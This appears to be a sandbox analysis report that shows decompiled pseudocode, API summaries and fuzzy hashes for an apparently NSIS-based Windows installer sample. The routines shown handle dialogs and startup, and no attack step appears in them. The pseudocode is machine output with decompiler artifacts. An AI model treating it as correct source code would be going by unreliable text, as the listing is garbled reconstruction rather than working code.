                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						SendMessageA( *0x423f18, 0x40f, 0, 1);
                                                                                                                                                                                                              						__eflags =  *0x423f0c - _t134; // 0x0
                                                                                                                                                                                                              						return 0 | __eflags == 0x00000000;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					_t126 = _a4;
                                                                                                                                                                                                              					_t134 = 0;
                                                                                                                                                                                                              					if(_t116 == 0x47) {
                                                                                                                                                                                                              						SetWindowPos( *0x420d30, _t126, 0, 0, 0, 0, 0x13);
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					if(_t116 == 5) {
                                                                                                                                                                                                              						asm("sbb eax, eax");
                                                                                                                                                                                                              						ShowWindow( *0x420d30,  ~(_a12 - 1) & _t116);
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					if(_t116 != 0x40d) {
                                                                                                                                                                                                              						__eflags = _t116 - 0x11;
                                                                                                                                                                                                              						if(_t116 != 0x11) {
                                                                                                                                                                                                              							__eflags = _t116 - 0x111;
                                                                                                                                                                                                              							if(_t116 != 0x111) {
                                                                                                                                                                                                              								L26:
                                                                                                                                                                                                              								return E00404313(_t116, _a12, _a16);
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t133 = _a12 & 0x0000ffff;
                                                                                                                                                                                                              							_t127 = GetDlgItem(_t126, _t133);
                                                                                                                                                                                                              							__eflags = _t127 - _t134;
                                                                                                                                                                                                              							if(_t127 == _t134) {
                                                                                                                                                                                                              								L13:
                                                                                                                                                                                                              								__eflags = _t133 - 1;
                                                                                                                                                                                                              								if(_t133 != 1) {
                                                                                                                                                                                                              									__eflags = _t133 - 3;
                                                                                                                                                                                                              									if(_t133 != 3) {
                                                                                                                                                                                                              										_t128 = 2;
                                                                                                                                                                                                              										__eflags = _t133 - _t128;
                                                                                                                                                                                                              										if(_t133 != _t128) {
                                                                                                                                                                                                              											L25:
                                                                                                                                                                                                              											SendMessageA( *0x423f18, 0x111, _a12, _a16);
                                                                                                                                                                                                              											goto L26;
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              										__eflags =  *0x4247ec - _t134;
                                                                                                                                                                                                              										if( *0x4247ec == _t134) {
                                                                                                                                                                                                              											_t100 = E0040140B(3);
                                                                                                                                                                                                              											__eflags = _t100;
                                                                                                                                                                                                              											if(_t100 != 0) {
                                                                                                                                                                                                              												goto L26;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											 *0x420120 = 1;
                                                                                                                                                                                                              											L21:
                                                                                                                                                                                                              											_push(0x78);
                                                                                                                                                                                                              											L22:
                                                                                                                                                                                                              											E00404285();
                                                                                                                                                                                                              											goto L26;
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              										E0040140B(_t128);
                                                                                                                                                                                                              										 *0x420120 = _t128;
                                                                                                                                                                                                              										goto L21;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									__eflags =  *0x40a1f8 - _t134; // 0xffffffff
                                                                                                                                                                                                              									if(__eflags <= 0) {
                                                                                                                                                                                                              										goto L25;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									_push(0xffffffff);
                                                                                                                                                                                                              									goto L22;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								_push(_t133);
                                                                                                                                                                                                              								goto L22;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							SendMessageA(_t127, 0xf3, _t134, _t134);
                                                                                                                                                                                                              							_t104 = IsWindowEnabled(_t127);
                                                                                                                                                                                                              							__eflags = _t104;
                                                                                                                                                                                                              							if(_t104 == 0) {
                                                                                                                                                                                                              								goto L61;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							goto L13;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						SetWindowLongA(_t126, _t134, _t134);
                                                                                                                                                                                                              						return 1;
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						DestroyWindow( *0x423f18);
                                                                                                                                                                                                              						 *0x423f18 = _a12;
                                                                                                                                                                                                              						L58:
                                                                                                                                                                                                              						if( *0x421d50 == _t134) {
                                                                                                                                                                                                              							_t143 =  *0x423f18 - _t134; // 0x0
                                                                                                                                                                                                              							if(_t143 != 0) {
                                                                                                                                                                                                              								ShowWindow(_t126, 0xa);
                                                                                                                                                                                                              								 *0x421d50 = 1;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						L61:
                                                                                                                                                                                                              						return 0;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              			}































                                                                                                                                                                                                              0x00403de1
                                                                                                                                                                                                              0x00403dea
                                                                                                                                                                                                              0x00403f2b
                                                                                                                                                                                                              0x00403f2f
                                                                                                                                                                                                              0x00403f33
                                                                                                                                                                                                              0x00403f35
                                                                                                                                                                                                              0x00403f3a
                                                                                                                                                                                                              0x00403f45
                                                                                                                                                                                                              0x00403f50
                                                                                                                                                                                                              0x00403f55
                                                                                                                                                                                                              0x00403f57
                                                                                                                                                                                                              0x00403f59
                                                                                                                                                                                                              0x00403f5c
                                                                                                                                                                                                              0x00403f61
                                                                                                                                                                                                              0x00403f6f
                                                                                                                                                                                                              0x00403f7c
                                                                                                                                                                                                              0x00403f83
                                                                                                                                                                                                              0x00403f83
                                                                                                                                                                                                              0x00403f84
                                                                                                                                                                                                              0x00403f84
                                                                                                                                                                                                              0x00403f89
                                                                                                                                                                                                              0x00403f8f
                                                                                                                                                                                                              0x00403f96
                                                                                                                                                                                                              0x00403f9c
                                                                                                                                                                                                              0x00403f9e
                                                                                                                                                                                                              0x00403fde
                                                                                                                                                                                                              0x00403fe3
                                                                                                                                                                                                              0x00403fe8
                                                                                                                                                                                                              0x00403fe8
                                                                                                                                                                                                              0x00403fed
                                                                                                                                                                                                              0x00403ff6
                                                                                                                                                                                                              0x00403ff8
                                                                                                                                                                                                              0x00403ffd
                                                                                                                                                                                                              0x00404003
                                                                                                                                                                                                              0x00404007
                                                                                                                                                                                                              0x00404007
                                                                                                                                                                                                              0x0040400c
                                                                                                                                                                                                              0x00404012
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040401d
                                                                                                                                                                                                              0x00404023
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040402c
                                                                                                                                                                                                              0x00404034
                                                                                                                                                                                                              0x00404039
                                                                                                                                                                                                              0x0040403c
                                                                                                                                                                                                              0x00404042
                                                                                                                                                                                                              0x00404047
                                                                                                                                                                                                              0x0040404a
                                                                                                                                                                                                              0x00404050
                                                                                                                                                                                                              0x00404055
                                                                                                                                                                                                              0x00404058
                                                                                                                                                                                                              0x0040405e
                                                                                                                                                                                                              0x00404066
                                                                                                                                                                                                              0x0040406c
                                                                                                                                                                                                              0x00404072
                                                                                                                                                                                                              0x00404076
                                                                                                                                                                                                              0x0040407d
                                                                                                                                                                                                              0x0040407d
                                                                                                                                                                                                              0x0040407d
                                                                                                                                                                                                              0x00404087
                                                                                                                                                                                                              0x00404099
                                                                                                                                                                                                              0x004040a5
                                                                                                                                                                                                              0x004040aa
                                                                                                                                                                                                              0x004040b4
                                                                                                                                                                                                              0x004040ba
                                                                                                                                                                                                              0x004040bc
                                                                                                                                                                                                              0x004040c1
                                                                                                                                                                                                              0x004040be
                                                                                                                                                                                                              0x004040be
                                                                                                                                                                                                              0x004040be
                                                                                                                                                                                                              0x004040d1
                                                                                                                                                                                                              0x004040e9
                                                                                                                                                                                                              0x004040eb
                                                                                                                                                                                                              0x004040f1
                                                                                                                                                                                                              0x00404106
                                                                                                                                                                                                              0x004040f3
                                                                                                                                                                                                              0x004040fc
                                                                                                                                                                                                              0x004040fe
                                                                                                                                                                                                              0x004040fe
                                                                                                                                                                                                              0x0040410c
                                                                                                                                                                                                              0x0040411d
                                                                                                                                                                                                              0x0040412e
                                                                                                                                                                                                              0x00404135
                                                                                                                                                                                                              0x0040413f
                                                                                                                                                                                                              0x00404144
                                                                                                                                                                                                              0x00404146
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040414c
                                                                                                                                                                                                              0x0040414c
                                                                                                                                                                                                              0x0040414e
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00404154
                                                                                                                                                                                                              0x00404158
                                                                                                                                                                                                              0x0040417d
                                                                                                                                                                                                              0x00404183
                                                                                                                                                                                                              0x00404189
                                                                                                                                                                                                              0x0040418b
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004041b1
                                                                                                                                                                                                              0x004041b7
                                                                                                                                                                                                              0x004041b9
                                                                                                                                                                                                              0x004041be
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004041c4
                                                                                                                                                                                                              0x004041c7
                                                                                                                                                                                                              0x004041ca
                                                                                                                                                                                                              0x004041e1
                                                                                                                                                                                                              0x004041ed
                                                                                                                                                                                                              0x00404206
                                                                                                                                                                                                              0x00404210
                                                                                                                                                                                                              0x00404215
                                                                                                                                                                                                              0x0040421b
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00404225
                                                                                                                                                                                                              0x00404230
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00404230
                                                                                                                                                                                                              0x0040415a
                                                                                                                                                                                                              0x00404160
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00404166
                                                                                                                                                                                                              0x0040416c
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00404172
                                                                                                                                                                                                              0x00404146
                                                                                                                                                                                                              0x0040423d
                                                                                                                                                                                                              0x00404249
                                                                                                                                                                                                              0x00404250
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403fa0
                                                                                                                                                                                                              0x00403fa0
                                                                                                                                                                                                              0x00403fa3
                                                                                                                                                                                                              0x00403fd6
                                                                                                                                                                                                              0x00403fd6
                                                                                                                                                                                                              0x00403fd8
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403fd8
                                                                                                                                                                                                              0x00403fa9
                                                                                                                                                                                                              0x00403fae
                                                                                                                                                                                                              0x00403fb0
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403fc0
                                                                                                                                                                                                              0x00403fc8
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403fce
                                                                                                                                                                                                              0x00403dfc
                                                                                                                                                                                                              0x00403dfc
                                                                                                                                                                                                              0x00403e00
                                                                                                                                                                                                              0x00403e05
                                                                                                                                                                                                              0x00403e14
                                                                                                                                                                                                              0x00403e14
                                                                                                                                                                                                              0x00403e1d
                                                                                                                                                                                                              0x00403e26
                                                                                                                                                                                                              0x00403e31
                                                                                                                                                                                                              0x00403e31
                                                                                                                                                                                                              0x00403e3d
                                                                                                                                                                                                              0x00403e59
                                                                                                                                                                                                              0x00403e5c
                                                                                                                                                                                                              0x00403e6f
                                                                                                                                                                                                              0x00403e75
                                                                                                                                                                                                              0x00403f18
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403f21
                                                                                                                                                                                                              0x00403e7b
                                                                                                                                                                                                              0x00403e88
                                                                                                                                                                                                              0x00403e8a
                                                                                                                                                                                                              0x00403e8c
                                                                                                                                                                                                              0x00403eab
                                                                                                                                                                                                              0x00403eab
                                                                                                                                                                                                              0x00403eae
                                                                                                                                                                                                              0x00403eb3
                                                                                                                                                                                                              0x00403eb6
                                                                                                                                                                                                              0x00403ec6
                                                                                                                                                                                                              0x00403ec7
                                                                                                                                                                                                              0x00403ec9
                                                                                                                                                                                                              0x00403eff
                                                                                                                                                                                                              0x00403f12
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403f12
                                                                                                                                                                                                              0x00403ecb
                                                                                                                                                                                                              0x00403ed1
                                                                                                                                                                                                              0x00403eea
                                                                                                                                                                                                              0x00403eef
                                                                                                                                                                                                              0x00403ef1
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403ef3
                                                                                                                                                                                                              0x00403edf
                                                                                                                                                                                                              0x00403edf
                                                                                                                                                                                                              0x00403ee1
                                                                                                                                                                                                              0x00403ee1
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403ee1
                                                                                                                                                                                                              0x00403ed4
                                                                                                                                                                                                              0x00403ed9
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403ed9
                                                                                                                                                                                                              0x00403eb8
                                                                                                                                                                                                              0x00403ebe
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403ec0
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403ec0
                                                                                                                                                                                                              0x00403eb0
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403eb0
                                                                                                                                                                                                              0x00403e96
                                                                                                                                                                                                              0x00403e9d
                                                                                                                                                                                                              0x00403ea3
                                                                                                                                                                                                              0x00403ea5
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403ea5
                                                                                                                                                                                                              0x00403e61
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403e3f
                                                                                                                                                                                                              0x00403e45
                                                                                                                                                                                                              0x00403e4f
                                                                                                                                                                                                              0x00404256
                                                                                                                                                                                                              0x0040425c
                                                                                                                                                                                                              0x0040425e
                                                                                                                                                                                                              0x00404264
                                                                                                                                                                                                              0x00404269
                                                                                                                                                                                                              0x0040426f
                                                                                                                                                                                                              0x0040426f
                                                                                                                                                                                                              0x00404264
                                                                                                                                                                                                              0x00404279
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00404279
                                                                                                                                                                                                              0x00403e3d

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E14
                                                                                                                                                                                                              • ShowWindow.USER32(?), ref: 00403E31
                                                                                                                                                                                                              • DestroyWindow.USER32 ref: 00403E45
                                                                                                                                                                                                              • SetWindowLongA.USER32 ref: 00403E61
                                                                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00403E82
                                                                                                                                                                                                              • SendMessageA.USER32 ref: 00403E96
                                                                                                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403E9D
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403F4B
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00403F55
                                                                                                                                                                                                              • SetClassLongA.USER32(?,000000F2,?), ref: 00403F6F
                                                                                                                                                                                                              • SendMessageA.USER32 ref: 00403FC0
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00404066
                                                                                                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00404087
                                                                                                                                                                                                              • EnableWindow.USER32(?,?), ref: 00404099
                                                                                                                                                                                                              • EnableWindow.USER32(?,?), ref: 004040B4
                                                                                                                                                                                                              • GetSystemMenu.USER32 ref: 004040CA
                                                                                                                                                                                                              • EnableMenuItem.USER32 ref: 004040D1
                                                                                                                                                                                                              • SendMessageA.USER32 ref: 004040E9
                                                                                                                                                                                                              • SendMessageA.USER32 ref: 004040FC
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00420D50,?,00420D50,00000000), ref: 00404126
                                                                                                                                                                                                              • SetWindowTextA.USER32(?,00420D50), ref: 00404135
                                                                                                                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 00404269
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                                                                                              • String ID: PB
                                                                                                                                                                                                              • API String ID: 184305955-3196168531
                                                                                                                                                                                                              • Opcode ID: 7ca70d26d5cdbf7e385cb3433e5eec3c9b526a6c029d08fd08a86bcbe3389ad2
                                                                                                                                                                                                              • Instruction ID: 6f64ab7c90c2728ca861f65b52108cf4a96aadf8bbc29eaef7369c8c365bd3a4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7ca70d26d5cdbf7e385cb3433e5eec3c9b526a6c029d08fd08a86bcbe3389ad2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2C1C2B1A00300BFDB216F61EE45D2B3AB8EB85746F41053EF641B51F1CB3999829B5D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                                                                              			E00403A3B(void* __eflags) {
                                                                                                                                                                                                              				intOrPtr _v4;
                                                                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                                                                              				int _v12;
                                                                                                                                                                                                              				void _v16;
                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                              				intOrPtr* _t17;
                                                                                                                                                                                                              				void* _t25;
                                                                                                                                                                                                              				void* _t27;
                                                                                                                                                                                                              				int _t28;
                                                                                                                                                                                                              				void* _t31;
                                                                                                                                                                                                              				int _t34;
                                                                                                                                                                                                              				int _t35;
                                                                                                                                                                                                              				intOrPtr _t36;
                                                                                                                                                                                                              				int _t39;
                                                                                                                                                                                                              				char _t57;
                                                                                                                                                                                                              				CHAR* _t59;
                                                                                                                                                                                                              				signed char _t63;
                                                                                                                                                                                                              				CHAR* _t74;
                                                                                                                                                                                                              				intOrPtr _t76;
                                                                                                                                                                                                              				CHAR* _t81;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t76 =  *0x424754;
                                                                                                                                                                                                              				_t17 = E00406631(2);
                                                                                                                                                                                                              				_t84 = _t17;
                                                                                                                                                                                                              				if(_t17 == 0) {
                                                                                                                                                                                                              					_t74 = 0x420d50;
                                                                                                                                                                                                              					"1033" = 0x30;
                                                                                                                                                                                                              					 *0x42b001 = 0x78;
                                                                                                                                                                                                              					 *0x42b002 = 0;
                                                                                                                                                                                                              					E0040610F(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420d50, 0);
                                                                                                                                                                                                              					__eflags =  *0x420d50;
                                                                                                                                                                                                              					if(__eflags == 0) {
                                                                                                                                                                                                              						E0040610F(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x420d50, 0);
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					lstrcatA("1033", _t74);
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					E00406186("1033",  *_t17() & 0x0000ffff);
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				E00403D00(_t71, _t84);
                                                                                                                                                                                                              				_t80 = "C:\\Users\\Albus\\AppData\\Local\\Temp";
                                                                                                                                                                                                              				 *0x4247e0 =  *0x42475c & 0x00000020;
                                                                                                                                                                                                              				 *0x4247fc = 0x10000;
                                                                                                                                                                                                              				if(E00405CAE(_t84, "C:\\Users\\Albus\\AppData\\Local\\Temp") != 0) {
                                                                                                                                                                                                              					L16:
                                                                                                                                                                                                              					if(E00405CAE(_t92, _t80) == 0) {
                                                                                                                                                                                                              						E004062BB(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t25 = LoadImageA( *0x424740, 0x67, 1, 0, 0, 0x8040);
                                                                                                                                                                                                              					 *0x423f28 = _t25;
                                                                                                                                                                                                              					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
                                                                                                                                                                                                              						L21:
                                                                                                                                                                                                              						if(E0040140B(0) == 0) {
                                                                                                                                                                                                              							_t27 = E00403D00(_t71, __eflags);
                                                                                                                                                                                                              							__eflags =  *0x424800;
                                                                                                                                                                                                              							if( *0x424800 != 0) {
                                                                                                                                                                                                              								_t28 = E00405421(_t27, 0);
                                                                                                                                                                                                              								__eflags = _t28;
                                                                                                                                                                                                              								if(_t28 == 0) {
                                                                                                                                                                                                              									E0040140B(1);
                                                                                                                                                                                                              									goto L33;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								__eflags =  *0x423f0c; // 0x0
                                                                                                                                                                                                              								if(__eflags == 0) {
                                                                                                                                                                                                              									E0040140B(2);
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								goto L22;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							ShowWindow( *0x420d30, 5);
                                                                                                                                                                                                              							_t34 = E004065C3("RichEd20");
                                                                                                                                                                                                              							__eflags = _t34;
                                                                                                                                                                                                              							if(_t34 == 0) {
                                                                                                                                                                                                              								E004065C3("RichEd32");
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t81 = "RichEdit20A";
                                                                                                                                                                                                              							_t35 = GetClassInfoA(0, _t81, 0x423ee0);
                                                                                                                                                                                                              							__eflags = _t35;
                                                                                                                                                                                                              							if(_t35 == 0) {
                                                                                                                                                                                                              								GetClassInfoA(0, "RichEdit", 0x423ee0);
                                                                                                                                                                                                              								 *0x423f04 = _t81;
                                                                                                                                                                                                              								RegisterClassA(0x423ee0);
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t36 =  *0x423f20; // 0x0
                                                                                                                                                                                                              							_t39 = DialogBoxParamA( *0x424740, _t36 + 0x00000069 & 0x0000ffff, 0, E00403DD8, 0);
                                                                                                                                                                                                              							E0040398B(E0040140B(5), 1);
                                                                                                                                                                                                              							return _t39;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						L22:
                                                                                                                                                                                                              						_t31 = 2;
                                                                                                                                                                                                              						return _t31;
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						_t71 =  *0x424740;
                                                                                                                                                                                                              						 *0x423ee4 = E00401000;
                                                                                                                                                                                                              						 *0x423ef0 =  *0x424740;
                                                                                                                                                                                                              						 *0x423ef4 = _t25;
                                                                                                                                                                                                              						 *0x423f04 = 0x40a210;
                                                                                                                                                                                                              						if(RegisterClassA(0x423ee0) == 0) {
                                                                                                                                                                                                              							L33:
                                                                                                                                                                                                              							__eflags = 0;
                                                                                                                                                                                                              							return 0;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						SystemParametersInfoA(0x30, 0,  &_v16, 0);
                                                                                                                                                                                                              						 *0x420d30 = CreateWindowExA(0x80, 0x40a210, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x424740, 0);
                                                                                                                                                                                                              						goto L21;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					_t71 =  *(_t76 + 0x48);
                                                                                                                                                                                                              					_t86 = _t71;
                                                                                                                                                                                                              					if(_t71 == 0) {
                                                                                                                                                                                                              						goto L16;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t74 = 0x4236e0;
                                                                                                                                                                                                              					E0040610F(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x424798, 0x4236e0, 0);
                                                                                                                                                                                                              					_t57 =  *0x4236e0; // 0x43
                                                                                                                                                                                                              					if(_t57 == 0) {
                                                                                                                                                                                                              						goto L16;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					if(_t57 == 0x22) {
                                                                                                                                                                                                              						_t74 = 0x4236e1;
                                                                                                                                                                                                              						 *((char*)(E00405BEB(0x4236e1, 0x22))) = 0;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t59 = lstrlenA(_t74) + _t74 - 4;
                                                                                                                                                                                                              					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
                                                                                                                                                                                                              						L15:
                                                                                                                                                                                                              						E00406228(_t80, E00405BC0(_t74));
                                                                                                                                                                                                              						goto L16;
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						_t63 = GetFileAttributesA(_t74);
                                                                                                                                                                                                              						if(_t63 == 0xffffffff) {
                                                                                                                                                                                                              							L14:
                                                                                                                                                                                                              							E00405C07(_t74);
                                                                                                                                                                                                              							goto L15;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_t92 = _t63 & 0x00000010;
                                                                                                                                                                                                              						if((_t63 & 0x00000010) != 0) {
                                                                                                                                                                                                              							goto L15;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						goto L14;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              			}

























                                                                                                                                                                                                              0x00403a41
                                                                                                                                                                                                              0x00403a4a
                                                                                                                                                                                                              0x00403a51
                                                                                                                                                                                                              0x00403a53
                                                                                                                                                                                                              0x00403a67
                                                                                                                                                                                                              0x00403a79
                                                                                                                                                                                                              0x00403a80
                                                                                                                                                                                                              0x00403a87
                                                                                                                                                                                                              0x00403a8d
                                                                                                                                                                                                              0x00403a92
                                                                                                                                                                                                              0x00403a98
                                                                                                                                                                                                              0x00403aab
                                                                                                                                                                                                              0x00403aab
                                                                                                                                                                                                              0x00403ab6
                                                                                                                                                                                                              0x00403a55
                                                                                                                                                                                                              0x00403a60
                                                                                                                                                                                                              0x00403a60
                                                                                                                                                                                                              0x00403abb
                                                                                                                                                                                                              0x00403ac5
                                                                                                                                                                                                              0x00403ace
                                                                                                                                                                                                              0x00403ad3
                                                                                                                                                                                                              0x00403ae4
                                                                                                                                                                                                              0x00403b6b
                                                                                                                                                                                                              0x00403b73
                                                                                                                                                                                                              0x00403b7c
                                                                                                                                                                                                              0x00403b7c
                                                                                                                                                                                                              0x00403b92
                                                                                                                                                                                                              0x00403b98
                                                                                                                                                                                                              0x00403ba6
                                                                                                                                                                                                              0x00403c27
                                                                                                                                                                                                              0x00403c2f
                                                                                                                                                                                                              0x00403c39
                                                                                                                                                                                                              0x00403c3e
                                                                                                                                                                                                              0x00403c44
                                                                                                                                                                                                              0x00403cce
                                                                                                                                                                                                              0x00403cd3
                                                                                                                                                                                                              0x00403cd5
                                                                                                                                                                                                              0x00403cf1
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403cf1
                                                                                                                                                                                                              0x00403cd7
                                                                                                                                                                                                              0x00403cdd
                                                                                                                                                                                                              0x00403ce5
                                                                                                                                                                                                              0x00403ce5
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403cdd
                                                                                                                                                                                                              0x00403c52
                                                                                                                                                                                                              0x00403c5d
                                                                                                                                                                                                              0x00403c62
                                                                                                                                                                                                              0x00403c64
                                                                                                                                                                                                              0x00403c6b
                                                                                                                                                                                                              0x00403c6b
                                                                                                                                                                                                              0x00403c76
                                                                                                                                                                                                              0x00403c7e
                                                                                                                                                                                                              0x00403c80
                                                                                                                                                                                                              0x00403c82
                                                                                                                                                                                                              0x00403c8b
                                                                                                                                                                                                              0x00403c8e
                                                                                                                                                                                                              0x00403c94
                                                                                                                                                                                                              0x00403c94
                                                                                                                                                                                                              0x00403c9a
                                                                                                                                                                                                              0x00403cb3
                                                                                                                                                                                                              0x00403cc4
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403cc9
                                                                                                                                                                                                              0x00403c31
                                                                                                                                                                                                              0x00403c33
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403ba8
                                                                                                                                                                                                              0x00403ba8
                                                                                                                                                                                                              0x00403bb4
                                                                                                                                                                                                              0x00403bbe
                                                                                                                                                                                                              0x00403bc4
                                                                                                                                                                                                              0x00403bc9
                                                                                                                                                                                                              0x00403bd8
                                                                                                                                                                                                              0x00403cf6
                                                                                                                                                                                                              0x00403cf6
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403cf6
                                                                                                                                                                                                              0x00403be7
                                                                                                                                                                                                              0x00403c22
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403c22
                                                                                                                                                                                                              0x00403aea
                                                                                                                                                                                                              0x00403aea
                                                                                                                                                                                                              0x00403aed
                                                                                                                                                                                                              0x00403aef
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403af9
                                                                                                                                                                                                              0x00403b09
                                                                                                                                                                                                              0x00403b0e
                                                                                                                                                                                                              0x00403b15
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403b19
                                                                                                                                                                                                              0x00403b1b
                                                                                                                                                                                                              0x00403b28
